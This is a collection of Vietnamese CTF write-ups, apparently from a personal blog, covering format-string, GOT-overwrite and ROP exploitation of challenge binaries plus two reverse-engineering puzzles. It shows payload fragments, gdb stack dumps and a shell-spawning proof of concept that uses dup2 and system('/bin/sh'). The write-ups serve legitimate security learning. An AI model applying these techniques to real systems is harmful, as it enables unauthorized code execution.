[WhiteHat Summer Contest 2017] fomat_me pwn100

Point: 100--format_me--
Format string is very popular. Can you exploit it this time?
BTW, Mui Ne is a familiar summer vacation destination in Viet Nam.
Netcat: nc formatme.wargame.whitehat.vn 1337
Download file:
http://material.wargame.whitehat.vn/contests/13/fomat_me.zip<md5:2b629d8aa66e63da677a691615363a25>
Backup:
http://bak.material.wargame.whitehat.vn/contests/13/fomat_me.zip<md5:2b629d8aa66e63da677a691615363a25>
nc backup.wargame.whitehat.vn 33333

fomat_me: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=bcdcd688ea5cc831304ff1a8b3f8d456c6669f04, not stripped

format string, stack buffer overflow quá rõ ràng.
Stack overflow thì có vẻ chưa ổn lắm vì dính CANARY.
Ta theo hướng format string, từ buff s tới ebp là 0x2c + 8 = 44 + 8 = 52 bytes.
Với lượng bytes như này thì payload format string sẽ thường đè qua cả stack cookie => call ___stack_chk_fail rồi exit.
Ta sẽ thực hiện ghi đè __stack_chk_fail GOT thành main để khi call ___stack_chk_fail ta sẽ quay về main lại, đồng thời thực hiện leak libc bằng __libc_start_main.

Tiếp theo khi trở lại được main rồi ta tiếp tục thực hiện ghi đè setvbuf => system, stdin => /bin/sh.
___stack_chk_fail sẽ được gọi thêm lần nữa => quay về main thực hiện setvbuf(stdin) lúc này là system("/bin/sh") => shell

Full payload: https://pastebin.com/5xE7fQgt

P/s: format_me chứ không phải fomat_me

[ASIS CTF 2017] Fu interpreter pwn 101

Fu interpreter

  

 

Average: 3

Rating Count: 2

You Rated: Not rated

Points

101

Solves

53

Category

Pwning

Description: We have developed a Fu interpreter, try your chance and find the flag. This service running on latest Ubuntu Xenial OS.

nc 69.90.132.40 4001

Link binary: https://asis-ctf.ir/tasks/fulang_e62955ff8cc20de534a29321b80fa246ddf9763f

main:

fu_interpreter:

Ta chỉ có 1 chỗ input duy nhất ở hàm main (line 20) nhưng không thể overflow được buf.

Ở fu_interpreter ta có thể kiểm soát được địa chỉ mà fu trỏ tới và giá trị tại địa chỉ đó nhưng không hề có 1 sự kiểm tra an toàn nào => ta có thể lợi dụng để ghi đè lên các vùng nhớ quan trọng nhằm thay đổi luồng thực thi của chương trình.

Xem xét từ main ta thấy fu = &data mà data nằm tại địa chỉ 0x0804A080 trong data segment.

fu tại địa chỉ 0x0804A060 trong data segment.

data segment nằm ngay trên got segment => đè got

Hướng giải quyết bài này: ghi đè địa chỉ system lên strlen_got thì fgets(buf, 150, stdin); len = strlen(buf) sẽ trở thành len = system(buf)

Các bước cần làm:

1. Ta cần thực hiện fu_interpreter nhiều lần nên cần quay lại main sau khi fu_interpreter. (1) => ghi đè puts_got thành main.
   
2. Sau khi quay lại được thì ta dùng fu_interpreter để leak địa chỉ trong libc nhằm tìm địa chỉ system.
3. Sau khi có địa chỉ system thì ta cần ghi đè system lên strlen_got
4. Nhập /bin/sh để truyền vào system strlen(buf)

Kết quả:

Full payload: https://pastebin.com/EpUmC080

[Writeup] PlaidCTF CTF 2015: EBP

Bài này cũ rồi nhưng mình thấy hay thì mình writeup thôi.

$ file ebp
ebp: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=4e8094f9986968cd856db5093810badbb0749fde, not stripped

Test:
$ ./ebp
phieulang
phieulang

%p%p%p
0xa0x1(nil)

=> Format string.

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : disabled
PIE       : disabled
RELRO     : Partial
------------------------------------------------------------------
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int result; // eax@3

  while ( 1 )
  {
    result = fgets(buf, 1024, stdin);
    if ( !result )
      break;
    echo();
  }
  return result;
}
------------------------------------------------------------------
int echo()
{
  make_response();
  puts(response);
  return fflush(stdout);
}
------------------------------------------------------------------
int make_response()
{
  return snprintf(response, 1024u, buf);
}
------------------------------------------------------------------
.bss:0804A080 ; char buf[1024]
.bss:0804A080 buf             db 400h dup(?)          ; DATA XREF: make_response+6 o
.bss:0804A080                                         ; main+21 o
.bss:0804A480                 public response
.bss:0804A480 ; char response[1024]
.bss:0804A480 response        db 400h dup(?) 

Payload được dùng tới 1024 bytes (khá thoải mái).
buf (format) ở BSS nên ta sẽ không tìm được offset tới buf để format string theo cách thông thường được.

NX disable => Hướng giải quyết là sẽ ghi shellcode lên buf (RELRO : Partial => địa chỉ cố định ở BSS) sau đó cho EIP nhảy về shellcode.

Ghi shellcode lên buf thì dễ rồi (tạm bỏ qua).
Control EIP nhảy về buf:

• Ghi đè ret?
• Ghi đè GOT?
• Ghi đè _fini_array?

Mình không break được vòng lặp ở main => loại phương án ghi đè _fini_array (bạn nào break được thì chỉ mình với).

=> 0x804851a <make_response+29>:        call   0x80483f0 <snprintf@plt>
Breakpoint 1, 0x0804851a in make_response ()
gdb-peda$ x/30wx $esp
0xffffd170:     0x0804a480      0x00000400      0x0804a080      0x0000000a
0xffffd180:     0x00000001      0x00000000      0xffffd1a8      0x0804852c (echo+11)
0xffffd190:     0xf7fc3ac0      0xf7ff04c0      0xffffd1f4      0xf7fc3000
0xffffd1a0:     0x00000000      0x00000000      0xffffd1c8      0x08048557 (main+16)
0xffffd1b0:     0x0804a080      0x00000400      0xf7fc3c20      0xf7fc3000
0xffffd1c0:     0x08048580      0x00000000      0x00000000      0xf7e31af3 (__libc_start_main+243)

Như vậy ta không tìm được bất kì địa chỉ GOT hay địa chỉ ret của hàm nào trong stack (0xffffd18c, 0xffffd1ac, 0xffffd1cc).
Nhưng ta được input nhiều lần => ghi đè nhiều lần để tạo ra được địa chỉ ret hoặc GOT trong stack.


Theo hướng ghi đè ret:
- Trong stack ta cần 1 con trỏ trỏ tới 1 vùng nhớ trên stack. (đã có 0xffffd180 -> 0xffffd1a8). Để leak địa chỉ con trỏ, format string hoàn toàn có thể leak được dễ dàng.

gdb-peda$ x/30wx $esp
0xffffd170:     0x0804a480      0x00000400      0x0804a080      0x0000000a
0xffffd180:     0x00000001      0x00000000      0xffffd1a8      0x0804852c (echo+11)
0xffffd190:     0xf7fc3ac0      0xf7ff04c0      0xffffd1f4      0xf7fc3000
0xffffd1a0:     0x00000000      0x00000000      0xffffd1c8      0x08048557 (main+16)
0xffffd1b0:     0x0804a080      0x00000400      0xf7fc3c20      0xf7fc3000
0xffffd1c0:     0x08048580      0x00000000      0x00000000      0xf7e31af3 (__libc_start_main+243)

- Ta thay đổi giá trị con trỏ để trỏ về địa chỉ ret. (0xffffd1a8 -> 0xffffd1ac (ret_of_echo) )

gdb-peda$ x/30wx $esp
0xffffd170:     0x0804a480      0x00000400      0x0804a080      0x0000000a
0xffffd180:     0x00000001      0x00000000      0xffffd1a8      0x0804852c (echo+11)
0xffffd190:     0xf7fc3ac0      0xf7ff04c0      0xffffd1f4      0xf7fc3000
0xffffd1a0:     0x00000000      0x00000000      0xffffd1ac      0x08048557 (main+16)
0xffffd1b0:     0x0804a080      0x00000400      0xf7fc3c20      0xf7fc3000
0xffffd1c0:     0x08048580      0x00000000      0x00000000      0xf7e31af3 (__libc_start_main+243)

- Ta tiếp tục thay đổi giá trị của địa chỉ ret về buf. (0xffffd1ac -> buf  0x0804A080)

gdb-peda$ x/30wx $esp
0xffffd170:     0x0804a480      0x00000400      0x0804a080      0x0000000a
0xffffd180:     0x00000001      0x00000000      0xffffd1a8      0x0804852c (echo+11)
0xffffd190:     0xf7fc3ac0      0xf7ff04c0      0xffffd1f4      0xf7fc3000
0xffffd1a0:     0x00000000      0x00000000      0xffffd1ac      0x0804A080 (buf)
0xffffd1b0:     0x0804a080      0x00000400      0xf7fc3c20      0xf7fc3000
0xffffd1c0:     0x08048580      0x00000000      0x00000000      0xf7e31af3 (__libc_start_main+243)

Mỗi lần ta chỉ cần ghi 2 bytes là đủ.

Vậy là xong ý tưởng.

Cách tính offset thì ta tính từ buf trở đi:
buf 0x0804a080 tại 0xffffd17c
0xffffd1a8 tại 0xffffd18c => offset = (0xffffd18c-0xffffd17c)/4 = 4

0xffffd1c8 tại 0xffffd1ac => offset = (0xffffd1ac-0xffffd17c)/4 = 12

POC:

$ python ebp.py
[+] Opening connection to 127.0.0.1 on port 8888: Done
debug?
[*] Switching to interactive mode

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               
1���Qh//shh/bin\x89�
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
$ id
uid=1000(phieulang) gid=1000(phieulang) groups=1000(phieulang),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)
$  

Full Payload: ebp.py

[Writeup] Tutorial - Pwn200 CSAW CTF 2016

Đã lâu rồi không viết writeup, nay Lãng đã comeback.

Đề cho 2 file: tutorial và libc-2.19.so

$ file tutorial

tutorial: ELF 64-bit LSB  executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=01e9b94153bb138f2dda5b5b9c490da7c255c68d, not stripped

Phân tích file turorial:

Sơ bộ trong main thì chương trình sẽ nhận đối số argv[1] làm port để listen socket.

Sau đó vào hàm priv(“tutorial”) kiểm tra username tutorial có tồn tại hay không. Phần này sau khi coi toàn bộ chương trình thì mình thấy nó không liên quan tới những phần còn lại, trên server nó tự có môi trường rồi nên mình tiến hành patch lại để debug cho dễ.

Mình sử dụng keypatch (http://www.keystone-engine.org/keypatch/) là 1 plugin cho IDA Pro giúp ta patch lại chương trình tốt hơn rất nhiều so với plugin có sẵn của IDA.

Patch từ 0x40123A tới 0x40124C thành nop (0x90).

Ngoài ra mình có thể patch lại call alarm cho dễ debug local cũng được.

Sau đó chương trình sẽ vào menu chính:

Tại đây ta có 3 lựa chọn:

1: call func1

2. call func2

3. exit

func1:

Như vậy tác dụng của func1 là leak cho ta 1 địa chỉ trong libc.

Từ đây ta có thể tính được các hàm khác trong libc như system, chuỗi /bin/sh

func2:

s tại rbp-0x140

v3 (cookie) tại rbp-0x8

Stack func2:

rbp+0x8 (ret)

rbp

rbp-0x8 (cookie)

…

rbp-0x140 (s)

Ta thấy read s tới 0x1cc bytes (>0x140) dẫn đến overflow được rbp+0x8 (ret) nhưng vấn đề ở đây là chương trình enable canary, nếu overflow lên stack làm cookie thay đổi, trước khi ret hàm sẽ check lại cookie báo lỗi và thoát.

Để ý ta thấy hàm write sẽ in ra 0x144 bytes từ s, như vậy sẽ in luôn cả cookie ra.

Như vậy ta cần thực hiện các bước để gọi được system(“/bin/sh”) chương trình:

1. leak libc (func1), tính system, /bin/sh

2. leak cookie

3. ghi đè lên stack với đúng cookie để nhảy về system, /bin/sh

Ở bước 3 ta cần một số gadget để đưa /bin/sh vào rdi.

Như vậy payload như sau:

payload = "\x90"*0x138

payload += cookie

payload += p64(menu)

payload += p64(popRDI)

payload += p64(str_bin_sh)

payload += p64(system)

Tiếp theo ta gặp phải vấn đề là server chạy được system(“/bin/sh”) nhưng ta ở client không thể truyền, nhận dữ liệu với process được. (chỉ truyền nhận từ stdout và stdin)

Để giải quyết vấn đề này ta sử dụng hàm dup2.

dup2() makes newfd be the copy of oldfd, closing newfd first if necessary (https://linux.die.net/man/2/dup2).

dup2(0x4,0x0) # 0x4: server socket, 0x0 stdin

dup2(0x4,0x1) # 0x4: server socket, 0x1 stdout

Có tới 2 đối số vì vậy ta cần thêm 1 gadget để đưa giá trị đối số thứ 2 vào RSI:

Payload:

payload = "\x90"*312

          payload += cookie

          payload += p64(menu)

          payload += p64(popRSI_pop)

          payload += p64(0x0)

          payload += p64(0x0)

          payload += p64(popRDI)

          payload += p64(0x4)

          payload += p64(dup2)

         

          payload += p64(popRSI_pop)

          payload += p64(0x1)

          payload += p64(0x1)

          payload += p64(popRDI)

          payload += p64(0x4)

          payload += p64(dup2)

         

          payload += p64(popRDI)

          payload += p64(str_bin_sh)

          payload += p64(system)

Full source: http://pastebin.com/06QAxR2w

[Writeup] UIT Hacking Contest Season W 2015 - RE200 SecretDotoItem

Đề cho:

Doto, best todo
SecretDotoItem.exe

Bài này mình thấy rất đơn giản nhưng một số bạn phải dùng tới Visual Studio debug hay patch các kiểu dữ dội quá nên mình show cách làm đơn giản của mình ra hy vọng giúp các bạn dễ dàng giải được các bài tương tự nếu gặp lại.

phieulang@phieulang-X550LD:~/Downloads/UIT_Contest$ file SecretDotoItem.exe
SecretDotoItem.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Á à. Trúng tủ =))
.NET thì cứ dùng .NET Reflector thôi.
Bật máy ảo lên:
Ngó qua ta thấy có 4 cái hàm chính cần quan tâm:
btnItem_Click
btnMagic_Click
CheckKey
Form1_Load

Check Form1_Load thấy không óc gì đặc biệt lắm.

Hàm btnItem_Click:
Chỉ là click vào button thì sẽ chuyển FlatStyle rồi gọi hàm CheckKey.

Qua CheckKey hóng:
Đọc sơ thì thấy nó duyệt qua mảng các button rồi qua các bước ta sẽ được 1 chuỗi res.
So sánh chuỗi res này với "tzcqqkohjsmudjgon" nếu trùng thì ẩn mảng các button kia đi và hiện button Magic lên.

Chuyển tiếp qua hàm btnMagic_Click:
Hàm này load cái file SecretDotoItem.secret.jpg trong Resource lên rồi xor với chuỗi res sau đó ghi ra.

Bingo. Flag là nó rồi :D
Mở resource lên coi cái hình xem thử.

Lỗi. Không hiển thị được.
Không hiển thị được là đúng rồi vì phải xor với chuỗi res mới hiển thị được :D

Chuột phải vào file này save as lại.

Viết 1 script python đơn giải để xor cái file với chuỗi res:
http://pastebin.com/MN3n0v7v

Run và check file re200_flag.jpg

Easy 200 points
 

[Writeup] RE200 - CSAW CTF 2015

Hacking Time

200

180 solves
We're getting a transmission from someone in the past, find out what he wants.
HackingTime_03e852ace386388eb88c39a02f88c773.nes

Mặc dù RE không phải sở trường của mình nhưng thôi kệ. Thấy hay hay cũng bay vào chiến.

lehuyhoang@lehuyhoang-X550LD:~/ctf/2015/csaw/re/re200$ file HackingTime_03e852ace386388eb88c39a02f88c773.nes
HackingTime_03e852ace386388eb88c39a02f88c773.nes: iNES ROM dump, 2x16k PRG, 1x8k CHR, [Vert.]

Google thì nó là Nintendo Entertainment System (NES) ROM. Nhớ về tuổi thơ ngày xưa chơi Contra, Mario với chơi Tank 1999 với papa cả đêm.

Đầu tiên là dùng giả lập fcuex trên ubuntu load room vào test.
Cứ ấn F để qua thôi :D Mấy cái tào lao lừa tình bỏ qua hết.
Tới 1 chỗ nó yêu cầu nhập password

Lấy password ở đâu trong khi password nó tới 24 kí tự thì không đoán được rồi.
Chắc phải debug thôi.
Google nes debugger nó ra cho mình cái No$NES Debugger
http://www.romhacking.net/utilities/807/
Down về giải nén nó ra NO$NES.EXE.
Dùng Wine chạy EXE hoặc qua Windows chạy thôi :D

Giao diện của No$Nes debugger

Tiếp theo ta load room vào:

File -> Floppy Menu (filename) -> tìm file .nes open thôi :D

Thay vì F như fceux thì ta ấn space để next.

Nhập thử password: ABCDEFGHIJK rồi space

Sau đó qua Debugger ta thấy như sau:

Khó nhìn quá nên mình chuyển qua Windows chạy cho dễ nhìn.

Ta thấy password của ta nhập vô nó nằm ở địa chỉ 0005 trong WRAM.

OK vào code tìm chỗ nào liên quan 0005 đặt breakpoint thôi.

Tìm được vài chỗ có [0005+y] ta đặt breakpoint bằng cách F2 hết những chỗ đó.
Sau đó qua bên chương trình chính space phát nữa để thử lại password ABCDEFGHIJK.
Ta thấy chương trình dừng lại do dính breakpoint ở địa chỉ: ROMO:82F7

Ta f7 trace coi các giá trị password của ta thay đổi và được kiểm tra như nào thôi.
Sau khi qua từa lưa bước thuật toán thay đổi giá trị thì kết quả sau đó của ta được lưu tại địa chỉ [001E]
Sau khi kiểm tra toàn bộ 24 (0x18) kí tự của password thì tới đoạn kiểm tra các giá trị tại địa chỉ [001E+0] tới [001E+24], nếu khác 0 thì sẽ văng ra và báo Access denied.
Mình có làm trick thử là thay đổi instruction từ JNZ thành JZ thì nó cho mình bypass password mặc dù password sai. Nhưng đoạn sau nó báo password chính là Flag luôn nên đành phải tìm hiểu thuật toán coi password là gì.

Qua quá trình debug và coi asm thì mình thấy mỗi kí tự của password sẽ RCL 3 lần, giá trị tại địa chỉ [3B] sẽ được RCR 2 lần. Sau đó ADC giá trị của kí tự password với giá trị tại [3B]. Sau đó xor kí tự của password đó với giá trị tại địa chỉ [955E+y] (với y là thứ tự của kí tự trong password), rồi lưu kết quả tại [3B]. Sau đó giá trị đó lại tiếp tục RCL 3 lần nữa rồi xor với giá trị tại [9576+y]
Nếu kết quả = 0 thì sẽ không bị thoát và báo access denied.
Vậy ta coi giá trị tại [955E] và [9575] sau đó coi thôi :D

Code:
http://pastebin.com/VHryXF8L
Trong quá trình debug mình bị hoa mắt nên debug chạy đi chạy lại thấy lạ vì add with carry mà 0xa4 + 0xe4 ra lại ra 0x2e. Thử đi thử lại rồi thử binary nó ra cộng thủ công bit cũng không thể nào ra được như thế. Hóa ra mình nhìn lộn 0x4a thành 0xa4 nên thế :'(
Thế là code cho nhanh để làm bài khác luôn vì vậy code chưa được đẹp và chuẩn cho lắm.

[Writeup-Showup] VIETTEL MATES CTF - Forensic250 Malware

Tạm thời showup.
Khi nào rảnh mình sẽ viết chi tiết sau :D